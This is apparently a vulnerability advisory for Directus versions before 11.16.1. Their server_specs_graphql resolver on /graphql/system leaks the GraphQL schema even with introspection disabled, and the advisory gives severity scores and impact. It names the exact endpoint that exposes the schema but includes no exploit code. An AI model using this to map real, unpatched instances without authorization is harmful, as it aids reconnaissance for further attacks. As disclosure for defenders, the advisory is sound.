Directus is a real‑time API and dashboard for managing SQL databases. An earlier release than 11.16.1 contains a logic error that lets an attacker bypass the GRAPHQL_INTROSPECTION setting. The server_specs_graphql resolver, exposed on the /graphql/system endpoint, returns the full SDL representation of the GraphQL schema even when introspection queries are disabled. This reveals collection names, field names, types and relationships to unauthenticated users at the public permission level and to authenticated users at their permitted level, constituting an information disclosure that can assist in further attacks.

Any Directus installation running a version earlier than 11.16.1 and having the GRAPHQL_INTROSPECTION configuration set to false is vulnerable. The flaw lives in the component that serves the /graphql/system endpoint and affects all deployments that expose the GraphQL API. Both unauthenticated visitors and users with GraphQL permissions can trigger the disclosure.

The CVSS score of 5.3 reflects moderate severity. With an EPSS score of less than 1 % the vulnerability is considered low probability of exploitation. It is not included in the CISA KEV catalog. Exploitation is straightforward: an attacker needs network access to the Directus instance’s /graphql/system endpoint and can retrieve the schema by issuing a simple request. Because the data disclosed consists of the schema’s structural information rather than actual content, the immediate confidentiality impact is limited, yet it can aid attackers in mapping the internal data model and planning subsequent attacks such as injection or privilege escalation.